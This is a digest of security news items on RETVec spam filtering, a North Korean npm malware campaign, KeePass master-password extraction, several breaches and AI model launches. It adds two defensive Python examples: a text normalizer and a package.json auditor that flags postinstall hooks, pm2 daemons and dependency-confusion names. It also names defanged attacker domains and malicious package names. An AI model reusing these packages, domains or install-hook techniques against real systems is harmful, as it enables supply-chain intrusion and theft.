Google says its platforms have seen adversarial text manipulations, such as homoglyphs, keyword stuffing, and invisible characters, used to evade these classifiers.

With out-of-the-box support for over 100 languages, RETVec aims to make server-side and on-device text classifiers more robust, more effective, and computationally cheaper.

In natural language processing (NLP), vectorization is a technique that maps words or phrases from a lexicon to a matching numerical representation for use in sentiment analysis, text classification, and named entity recognition, among other analyses. 
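The toy vectorizer below is an added example, not Google's code and not a description of how RETVec works internally. It shows the failure mode the post is about: a vectorizer that looks raw tokens up in a fixed lexicon sends any word with a homoglyph, LEET digit or invisible character to the out-of-vocabulary bucket, so the classifier never sees the spam keyword. A small normalization pass (Unicode compatibility form, zero-width removal, a confusables map and a LEET map) recovers the intended token. The lexicon, the character tables and the sample message are constructed for the example.

```python
import unicodedata

# Constructed toy lexicon: a real classifier has thousands of tokens,
# but the failure mode is the same.
LEXICON = ["free", "money", "click", "here", "urgent"]
VOCAB = {word: idx for idx, word in enumerate(LEXICON)}
UNK = len(LEXICON)  # index reserved for out-of-vocabulary tokens

# Zero-width and byte-order-mark characters that render as nothing.
INVISIBLE = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
# A few Cyrillic letters that look identical to Latin ones (homoglyphs).
HOMOGLYPHS = {"\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o",
              "\u0440": "p", "\u0445": "x", "\u0443": "y"}
# Common LEET substitutions.
LEET = {"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t",
        "@": "a", "$": "s"}


def naive_vectorize(text):
    """Lexicon lookup on raw whitespace-split tokens: any character-level
    change to a word sends it to the UNK bucket."""
    return [VOCAB.get(tok.lower(), UNK) for tok in text.split()]


def normalize_token(tok):
    """Undo the manipulations the post lists: compatibility forms
    (e.g. fullwidth letters), invisible characters, homoglyphs and LEET."""
    tok = unicodedata.normalize("NFKC", tok).lower()
    tok = "".join(HOMOGLYPHS.get(c, c) for c in tok if c not in INVISIBLE)
    # Only apply the LEET map to tokens that contain letters, so genuine
    # numbers such as "2023" are left alone.
    if any(c.isalpha() for c in tok):
        tok = "".join(LEET.get(c, c) for c in tok)
    return tok


def robust_vectorize(text):
    """Same lexicon lookup, but on normalized tokens."""
    return [VOCAB.get(normalize_token(tok), UNK) for tok in text.split()]


# Constructed sample: "Free money click here" with a Cyrillic 'е' in "free",
# a LEET zero in "money" and a zero-width space inside "click".
SAMPLE = "Fr\u0435\u0435 m0ney cl\u200bick here"

if __name__ == "__main__":
    print("naive :", naive_vectorize(SAMPLE))   # [5, 5, 5, 3]
    print("robust:", robust_vectorize(SAMPLE))  # [0, 1, 2, 3]
```

The point of the example is the gap between the two outputs: three of the four tokens are invisible to the naive lookup, which is exactly the kind of manipulation a character-level encoder is meant to absorb without a hand-maintained table like the one above.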

Google’s anti-abuse researchers Elie Bursztein and Marina Zhang note in the Google Security blog that, “due to its novel architecture, RETVec works out-of-the-box on every language and all UTF-8 characters without the need for text preprocessing, making it the ideal candidate for on-device, web, and large-scale text classification deployments." 

Google further notes that incorporating the vectorizer into Gmail has markedly improved spam detection, raising the detection rate by 38% over the baseline and lowering the false positive rate by 19.4%.

Moreover, the vectorizer has also reduced the model's Tensor Processing Unit (TPU) usage by 83%.

"Models trained with RETVec exhibit faster inference speed due to its compact representation. Having smaller models reduces computational costs and decreases latency, which is critical for large-scale applications and on-device models," Bursztein and Zhang added. 

Spam is the most popular attack vector in the virtual space, used by almost every cybercriminal. Its popularity comes from being omnipresent, cheap, and efficient, enabling cybercriminals to deliver malware and access sensitive data on targeted systems.

New Cyber Threat: North Korean Hackers Exploit npm for Malicious Intent

GitHub has issued an updated threat warning about a new North Korean attack campaign that uses malicious npm package dependencies to compromise victims. In a blog post published earlier this week, the development platform said the attacks target employees of blockchain, cryptocurrency, online gambling, and cybersecurity companies.

Alexis Wales, VP of GitHub security operations, said the attacks often begin with attackers posing as developers or recruiters using fake GitHub, LinkedIn, Slack, or Telegram profiles. In some cases, legitimate accounts have been hijacked by the attackers.

Another highly targeted attack campaign has been launched against the npm package registry, aimed at enticing developers into installing malicious third-party modules. According to The Hacker News, this wave appears to exhibit behaviour similar to a significant attack wave uncovered in June, which the supply-chain security firm Phylum has since linked to North Korean threat actors.

Between August 9 and August 12, 2023, nine packages were uploaded to npm: ws-paso-jssdk, pingan-vue-floating, srm-front-util, cloud-room-video, progress-player, ynf-core-loader, ynf-core-renderer, ynf-dx-scripts, and ynf-dx-webpack-plugins. The attackers first initiate a conversation with the target and then attempt to move it to another platform.

The attack chain begins with a postinstall hook in package.json that runs index.js after the package has been installed. In this instance, index.js launches a daemon process named Android, using the legitimate pm2 module (declared as a dependency), which in turn executes a JavaScript file named app.js.

The script initiates encrypted two-way communication with a remote server 45 seconds after the package is installed, contacting "ql.rustdesk[.]net", a spoofed domain posing as the authentic RustDesk remote desktop software, and sends details about the compromised host.

The malware then pings the server every 45 seconds to check for further instructions, which are decoded and executed in turn. As the Phylum Research Team explained, "It would seem to be that the attackers are monitoring the GUIDs of the machines in question and selectively sending additional payloads (which are encoded Javascript code) to the machines of interest in the direction of the GUID monitors."

In the past few months, several typosquatted versions of popular Ethereum packages have been discovered in the npm registry that attempt to make HTTP requests to Chinese servers to retrieve the wallet's encryption key from wallet.cba123[.]cn.

Additionally, the highly popular NuGet package Moq has come under fire after new versions released last week included a dependency named SponsorLink, which extracted the SHA-256 hash of developers' email addresses from local Git configurations and sent them to a cloud service without their knowledge.

Version 4.20.2 has been rolled back as a result of the controversial changes, which raise GDPR compliance issues. Even so, BleepingComputer reported that Amazon Web Services (AWS) had withdrawn its support for the project, which may have seriously damaged the project's reputation.

There are also reports that organizations are increasingly vulnerable to dependency confusion attacks, which can lead developers to unwittingly introduce malicious or vulnerable code into their projects, resulting in large-scale supply chain attacks.

Several mitigations can prevent dependency confusion attacks. For example, it is recommended to publish internal packages under scopes assigned to organizations and to register internal package names as placeholders in the public registry so that those names cannot be claimed by others.
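The audit below is an added example, not GitHub's or Phylum's code. It checks a package.json for the two things the sections above describe: install-time lifecycle hooks of the kind that launched index.js (and a process manager such as pm2 used to keep a payload running), and internal package names declared outside the organization's scope, which is the dependency confusion case the mitigations address. The scope `@example-org`, the internal package name `auth-utils` and both sample manifests are constructed for the example.

```python
import json

# Lifecycle scripts that npm runs automatically during `npm install`;
# a "postinstall" hook is what launched index.js in the campaign above.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Process managers an install script might use to keep a payload running
# after installation; pm2 is the one named in the article.
DAEMON_TOOLS = ("pm2", "forever")


def audit_package_json(text, internal_scope, internal_names):
    """Return a list of findings for a package.json manifest given as text.

    internal_scope is the npm scope the organization publishes under
    (hypothetical "@example-org" in the sample); internal_names are the bare
    names of its private packages.  Both are assumptions for this example.
    """
    pkg = json.loads(text)
    findings = []

    # 1. Anything that runs at install time deserves a look.
    scripts = pkg.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        findings.append(f"install hook '{hook}' runs: {cmd}")
        for tool in DAEMON_TOOLS:
            if tool in cmd.split():
                findings.append(f"install hook '{hook}' uses process manager '{tool}'")

    # 2. Collect every declared dependency, whatever section it sits in.
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(pkg.get(section, {}))

    for tool in DAEMON_TOOLS:
        if tool in deps:
            findings.append(f"depends on process manager '{tool}'")

    # 3. An internal package name that is not under the org scope could be
    #    resolved from the public registry instead of the private one.
    for name in deps:
        bare = name.split("/", 1)[1] if name.startswith("@") else name
        if bare in internal_names and not name.startswith(internal_scope + "/"):
            findings.append(
                f"dependency '{name}' matches internal package '{bare}' but is not "
                f"under scope {internal_scope}: dependency-confusion risk")
    return findings


# Constructed manifests: one shaped like the chain described above,
# one that follows the scoping recommendation.
SUSPICIOUS = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {"postinstall": "node index.js"},
    "dependencies": {"pm2": "^5.3.0", "auth-utils": "1.2.0"},
})
CLEAN = json.dumps({
    "name": "@example-org/app",
    "version": "1.0.0",
    "scripts": {"test": "jest"},
    "dependencies": {"@example-org/auth-utils": "1.2.0"},
})

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS), ("clean", CLEAN)):
        for finding in audit_package_json(text, "@example-org", {"auth-utils"}) or ["no findings"]:
            print(f"[{label}] {finding}")
```

A finding on an install hook is not proof of malice (many legitimate packages build native code in `install`), but it is the place to read before running anything. For CI and developer machines, npm's `--ignore-scripts` option (or `ignore-scripts=true` in `.npmrc`) stops lifecycle hooks from running at all during `npm install`, which removes this execution path entirely.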

The recent North Korean campaign exploiting npm packages is an unmistakable reminder that the threat landscape is changing and that increasingly sophisticated tactics are in use. Safeguarding sensitive data and preventing further breaches requires proactive measures and constant vigilance. To reduce the risks posed by these intricate tactics, organizations need to prioritize identity verification, package validation, and the management of internal packages.

GitHub Issues Alert on Lazarus Group's Social Engineering Attack on Developers

According to a security alert issued by GitHub, a social engineering campaign is targeting the accounts of developers in the blockchain, cryptocurrency, online gambling, and cybersecurity industries.

The campaign has reportedly been linked to the Lazarus hacking group sponsored by the North Korean state, which is also tracked as Jade Sleet and TraderTraitor (names used by Microsoft Threat Intelligence and others). A report released by the United States government in 2022 detailed the threat actors' tactics.

The Lazarus Group, which also operates under the names Jade Sleet and TraderTraitor, targets cryptocurrency companies and cybersecurity researchers to spy on them and steal their coins; cyberespionage and cryptocurrency theft are two of the group's main activities. According to GitHub, no GitHub or npm systems or accounts were compromised in this campaign.

Lazarus Group reportedly poses as developers or recruiters on GitHub and social media, using either fake personas or legitimate accounts that have been compromised. A wide range of personas is designed to engage individuals in the targeted industries, and the conversation is ultimately steered to another platform, such as WhatsApp.

The threat actors normally initiate collaboration on a project. After establishing trust, they invite targets to clone a GitHub repository related to media players or cryptocurrency trading tools. These projects, however, contain malicious npm dependencies that download additional malware onto the targets' devices.

In June 2022, Phylum published a report on these malicious npm packages with details about how they behave, even though GitHub has not provided details about the malware's specific behavior. Phylum reports that the packages function as malware downloaders that connect to remote websites via a browser to download additional payloads onto the infected machine. Limitations in the payload delivery process meant that researchers were unable to analyze the final malware delivered.

As a consequence of this campaign, GitHub has suspended all npm and GitHub accounts associated with it. It has also published a list of indicators, including domains, GitHub accounts, and npm packages, that can be used to identify the campaign. GitHub says the campaign was not aimed at damaging its own systems.

Lazarus has run similar social engineering campaigns in the past, including the targeting of security researchers in January 2021, a fake company website created in March 2021, and a fake email campaign in July 2021. In these attacks, the threat actors proved effective at creating elaborate personas and distributing malware disguised as exploits for vulnerabilities.

Lazarus targets cryptocurrency companies and developers to fund initiatives for the North Korean government, and has stolen several million dollars' worth of cryptocurrency in the process. Notably, the theft of over 617 million dollars' worth of Ethereum and USDC tokens was reported in a recent attack on Axie Infinity.

Aside from fund theft and phishing scams, Lazarus has allegedly employed other tactics, including sending targets malicious PDF files disguised as job offers that could compromise their bank accounts; the group has successfully used fake employment opportunities as a way to deliver malware.

Developers and others in the targeted industries should remain vigilant against the many forms of social engineering attacks. Individuals who are aware of the tactics used by threat actors and adopt good cybersecurity practices, such as verifying the authenticity of requests and avoiding suspicious or unknown links and downloads, can generally protect themselves and their devices from malicious software.

Attack Process by the Lazarus Group

To begin with, the threat actor poses as a developer or recruiter on GitHub and other social media websites frequented by developers and recruiters. To contact victims, the group uses its own fake accounts as well as legitimate accounts that Jade Sleet has compromised.

In some instances the actor initiates contact on one platform and switches to another after a few minutes. Once connected with a victim, the threat actor invites them to collaborate on a GitHub repository and persuades the target to clone and execute its contents. In some cases the attacker instead sends the malicious software directly through a messaging or file-sharing service, without any repository invitation.

The GitHub repository includes a malicious npm dependency. The software the threat actor builds poses as media players or cryptocurrency trading tools. The malicious npm packages download secondary malware onto the victim's machine. A malicious package is normally not published until the fake repository invitation has been sent to the target.

IOC details have been shared on the GitHub blog, and the npm and GitHub accounts associated with the campaign have been suspended. In practice, the most effective way to avoid this campaign is to be cautious of social media solicitations to collaborate on, or install, software that relies on npm packages or dependencies.

Lazarus Attacks in The Past 

North Korean hackers have long targeted cryptocurrency companies and developers to steal assets that fund their country's initiatives. To steal cryptocurrency wallets and funds, Lazarus spreads Trojanized cryptocurrency wallet and exchange apps to cryptocurrency users.

The U.S. Secret Service and the FBI have linked the Lazarus group to the theft of USDC and Ethereum tokens worth over $617 million from the blockchain-based game Axie Infinity. The threat actors were later revealed to have sent one of the company's blockchain engineers a malware-laced PDF file disguised as a lucrative job offer, which led to the attack.

Additionally, in 2020, a campaign called "Operation Dream Job" used fake employment opportunities to deliver malware to employees at prominent aerospace and defense companies in the US.

Shockbyte Assures Users of Data Safety Amid Git Leak Incident

Minecraft enthusiasts were taken aback by recent reports of a security breach at Shockbyte, one of the leading Minecraft server hosting providers. However, the company has come forward to assure its users that there is no cause for concern regarding their data. The incident, which involved a leak of data through Git, raised eyebrows among the Minecraft community, but Shockbyte quickly took action to address the issue.

The news of the security incident spread rapidly across various tech publications, causing a wave of worry among Shockbyte's user base. TechRadar, CyberNews, and Yahoo! were among the platforms that covered the story, amplifying concerns about potential data compromise. However, it is essential to clarify the company's response and the actions taken to ensure data safety.

Shockbyte promptly acknowledged the situation and undertook a thorough investigation into the incident. The hosting provider determined that the breach occurred through a leak in their Git repository, a widely used version control system. Although Git leaks can be serious, Shockbyte acted swiftly to minimize any potential impact on its users.

In a public statement, Shockbyte reassured its customers that no sensitive personal data, including passwords or payment information, had been compromised. The leaked data primarily consisted of code and configuration files related to server setups. While this incident is undoubtedly concerning, it is important to note that the leaked information does not pose a direct threat to users' personal data or accounts.

The company has taken immediate steps to address the issue and mitigate any potential risks. Shockbyte has thoroughly reviewed its security measures and implemented additional safeguards to prevent similar incidents from occurring in the future. They have also emphasized the importance of strong passwords and recommended that users change their login credentials as an extra precaution.

Furthermore, Shockbyte has been transparent in its communication with its users throughout the incident. They have actively updated their customers via their official website and social media channels, providing detailed information about the breach and the steps taken to resolve it. By maintaining open lines of communication, Shockbyte has demonstrated its commitment to ensuring the trust and confidence of its user community.

As Minecraft continues to captivate millions of players worldwide, the importance of robust server hosting and data security cannot be overstated. Shockbyte's response to the Git leak incident serves as a reminder of the need for constant vigilance in safeguarding user data. The incident has undoubtedly been a learning experience for the company, further strengthening its commitment to data protection and cybersecurity.

KeePass Vulnerability: Hackers May Have Stolen the Master Passwords

One would expect an ideal password manager to at least keep their users’ passwords safe and secure. On the contrary, a new major vulnerability turned out to be putting the KeePass password manager users at serious risk of their passwords being breached.

Apparently, the vulnerability enables an attacker to extract the master password from the target computer's memory in plain text, that is, in unencrypted form. Although it is a fairly easy hack, its repercussions could be unsettling.

Password managers, like in this case KeePass, lock up a user’s login info encrypted and secure behind a master password in order to keep it safe. The vault is a valuable target for hackers since the user is required to input the master password to access everything within.

How is KeePass Vulnerability a Problem? 

Security researcher 'vdohney,' according to a report by Bleeping Computer, found the KeePass vulnerability and posted a proof-of-concept (PoC) program on GitHub.

With the exception of the initial one or two characters, this tool can almost entirely extract the master password in readable, unencrypted form. Even if KeePass is locked and, possibly, if the app is completely closed, it is still capable of doing this.

All this is because the vulnerability extracts the master password from KeePass’s memory. This can be acquired, as the researcher says, in a number of ways: “It doesn’t matter where the memory comes from — can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys) or RAM dump of the entire system.”

The exploit is only possible due to some custom code KeePass uses. Your master password is entered in a unique box named SecureTextBoxEx. Despite its name, it turns out that this box is actually not all that secure since each character that is entered essentially creates a duplicate of itself in the system memory. The PoC tool locates and extracts these remaining characters.

‘A Fix is Incoming’ 

The only limitation of this attack is that it requires physical access to the computer from which the master password is to be taken. That is not always a problem, however; as the LastPass case demonstrated, hackers can reach a target's computer by exploiting weak remote access software installed on the device.

If a device is infected with malware, the malware could be set up to dump KeePass's memory and send it, along with the app's database, back to the attacker's server, giving the threat actor time to recover the master password.

Fortunately, the developer of KeePass promises that a fix is incoming; one of the potential fixes is to add random dummy text that would obscure the password into the app's memory. It may be agonizing to wait until June or July 2023 for the update to be made available for anyone concerned about their master password being compromised. The fix, however, is also available in beta form and may be downloaded from the KeePass website.    

GitHub Introduces the AI-powered Copilot X, which Uses OpenAI's GPT-4 Model

The open-source developer platform GitHub, which is owned by Microsoft, has revealed the debut of Copilot X, the company's vision of the future of AI-powered software development.

GitHub has adopted OpenAI's new GPT-4 model and added chat and voice support for Copilot, bringing Copilot to pull requests, the command line, and documentation to answer questions about developers' projects.

'From reading docs to writing code to submitting pull requests and beyond, we're working to personalize GitHub Copilot for every team, project, and repository it's used in, creating a radically improved software development lifecycle,' Thomas Dohmke, CEO at GitHub, said in a statement.

'At the same time, we will continue to innovate and update the heart of GitHub Copilot -- the AI pair programmer that started it all,' he added.

Copilot chat recognizes what code a developer has entered and what error messages are displayed, and it is deeply integrated into the IDE (Integrated Development Environment).

As stated by the company, Copilot chat will join GitHub's previously demoed voice-to-code AI technology extension, which it is now calling 'Copilot voice,' where developers can verbally give natural language prompts. Furthermore, developers can now sign up for a technical preview of the first AI-generated pull request descriptions on GitHub.

This new feature is powered by OpenAI's new GPT-4 model and adds support for AI-powered tags in pull request descriptions via a GitHub app that organization admins and individual repository owners can install.

As per the company, GitHub is also going to launch Copilot for docs, an experimental tool that uses a chat interface to provide users with AI-generated responses to documentation questions, including questions about the languages, frameworks, and technologies they are using.

Meta Announces a New AI-powered Large Language Model

On Friday, Meta introduced its new AI-powered large language model (LLM) named LLaMA-13B that, in spite of being "10x smaller," can outperform OpenAI's GPT-3 model. Language assistants in the ChatGPT style could be run locally on devices like computers and smartphones, thanks to smaller AI models. It is a part of the brand-new group of language models known as "Large Language Model Meta AI," or LLAMA. 

The size of the language models in the LLaMA collection ranges from 7 billion to 65 billion parameters. In contrast, the GPT-3 model from OpenAI, which served as the basis for ChatGPT, has 175 billion parameters. 

Meta could potentially release its LLaMA model and weights as open source, since it trained the models on openly available datasets such as Common Crawl, Wikipedia, and C4. This would mark a breakthrough in a field where Big Tech competitors in the AI race have traditionally kept their most potent AI technology to themselves.

In regards to the same, Project member Guillaume’s tweet read "Unlike Chinchilla, PaLM, or GPT-3, we only use datasets publicly available, making our work compatible with open-sourcing and reproducible, while most existing models rely on data which is either not publicly available or undocumented." 

Meta refers to its LLaMA models as "foundational models," which indicates that the company intends for the models to serve as the basis for future, more sophisticated AI models built off the technology, the same way OpenAI constructed ChatGPT on the base of GPT-3. The company anticipates using LLaMA to further applications like "question answering, natural language understanding or reading comprehension, understanding capabilities and limitations of present language models" and to aid in natural language research. 

While the top-of-the-line LLaMA model (LLaMA-65B, with 65 billion parameters) competes head-to-head with comparable products from rival AI labs DeepMind, Google, and OpenAI, arguably the most intriguing development is the LLaMA-13B model, which, as previously mentioned, can reportedly outperform GPT-3 while running on a single GPU when measured across eight common "common sense reasoning" benchmarks such as BoolQ and PIQA. LLaMA-13B opens the door to ChatGPT-like performance on consumer-level hardware in the near future, unlike the data center requirements of GPT-3 derivatives.

In AI, parameter size is significant. A parameter is a variable that a machine-learning model employs in order to generate hypotheses or categorize data as input. The size of a language model's parameter set significantly affects how well it performs, with larger models typically able to handle more challenging tasks and generate output that is more coherent. However, more parameters take up more room and use more computing resources to function. A model is significantly more efficient if it can provide the same outcomes as another model with fewer parameters. 

"I'm now thinking that we will be running language models with a sizable portion of the capabilities of ChatGPT on our own (top of the range) mobile phones and laptops within a year or two," said Simon Willison, an independent AI researcher, in a Mastodon thread analyzing and monitoring the impact of Meta's new AI models.

Currently, a simplified version of LLaMA is being made available on GitHub. The whole code and weights (the "learned" training data in a neural network) can be obtained by filling out a form provided by Meta. A wider release of the model and weights has not yet been announced by Meta.  

Canadian Telecom Provider Telus is Reportedly Breached

One of Canada's biggest telecommunications companies, Telus, is allegedly investigating a system breach believed to be fairly severe when malicious actors exposed samples of what they claimed to be private corporate information online.

As per sources, the malicious actors posted on BreachForums offering to sell an email database that they claimed included the email addresses of every Telus employee. The database has a $7,000 price tag. For $6,000, one could access another database purported to contain payroll details for the telecom company's top executives, including the president.

A data bundle with more than 1,000 private GitHub repositories allegedly belonging to Telus was also offered for sale by the threat actor for $50,000. A SIM-swapping API was reportedly included in the source code that was for sale. SIM-swapping is the practice of hijacking another person's phone by switching the number to one's own SIM card.

Although the malicious actors have described this as a complete breach and have threatened to sell everything connected to Telus, it is still too early to say whether an event actually occurred at TELUS or whether the breach happened at a third-party vendor.

A TELUS representative told BleepingComputer that the company is looking into accusations that some information about selected TELUS team members and internal source code has leaked on the dark web.

If it occurred as the malicious actors claim, the Telus breach would be the latest in a string of recent attacks on telecom companies. Three of the biggest telecommunications companies in Australia, Optus, Telstra, and Dialog, have all been infiltrated by attackers since the beginning of the year.

Customer data was used in a cyberattack that affected the Medisys Health Group business of Telus in 2020. The company claimed at the time that it paid for the data and then securely retrieved it. Although TELUS is still keeping an eye on the potential incident, it has not yet discovered any proof that corporate or retail customer data has been stolen.

Extortion Attempt by Former Ubiquiti Developer

Former Ubiquiti employee Nickolas Sharp admitted to the company that he stole gigabytes of private data from the company's network while he was overseeing the company's cloud technology team. During this period, he misrepresented himself as an anonymous hacker and whistleblower to avoid detection. Ubiquiti's GitHub repositories and AWS servers were breached in December 2020 by Sharp, a 36-year-old software engineer from Portland, Oregon. 

Sharp agreed to plead guilty to three charges: making false statements to the FBI, wire fraud, and sending a malicious computer program to a protected computer. The offenses carry a maximum sentence of 35 years in prison.

Ubiquiti reported the data theft as a security incident in January 2021.

Posing as an anonymous hacker and pretending to target the company, Sharp tried to extort it. The ransom note demanded 50 bitcoins, approximately $1.9 million at the time, in exchange for returning the data and disclosing the weakness in the network that allowed the hack to take place. Rather than pay the ransom, Ubiquiti chose to change every employee's login credentials. A second security breach was also discovered in the business's systems, and was found and eliminated before the business notified the government of the breach on December 11.

Sharp was identified as the hacker after investigators found that Ubiquiti's AWS infrastructure (on December 10, 2020) and GitHub repositories (on December 21 and 22) had been cloned over SSH using his cloud administrator credentials, and that private files had been stolen.

Although he used the Surfshark VPN service to conceal his IP address while collecting the data, a short internet outage exposed his real location. He also changed the log retention rules on Ubiquiti's servers and altered other data that would have revealed his identity during the investigation, in order to conceal his identity.

The FBI searched Nickolas Sharp's residence on March 24, 2021, and seized electronic equipment belonging to him. He made several false statements to FBI officials when he was interrogated.

He claimed that he was not the one who committed the crime and that he had never previously used a VPN service of this type. According to records, Sharp had purchased the Surfshark VPN service about six months before the incident occurred, in July 2020; it was obtained three months beforehand. He falsely alleged that another party had accessed his PayPal account to complete that transaction.

In a media interview after the extortion attempt failed, Sharp, posing as a whistleblower, alleged that Ubiquiti had downplayed the breach to avoid retribution. After he challenged Ubiquiti's assertions about the impact of the January hack, the company acknowledged that it had been the target of an extortion attempt following the incident and said there was no indication that any of its users' accounts had been hacked.

He also claimed that Ubiquiti had no logging mechanism that would let it determine whether the "attacker" had accessed any systems or data, and that this would have prevented the company from determining what had occurred. Contrary to these assertions, the information provided by the Justice Department indicates that he altered the company's logs and that the system was compromised.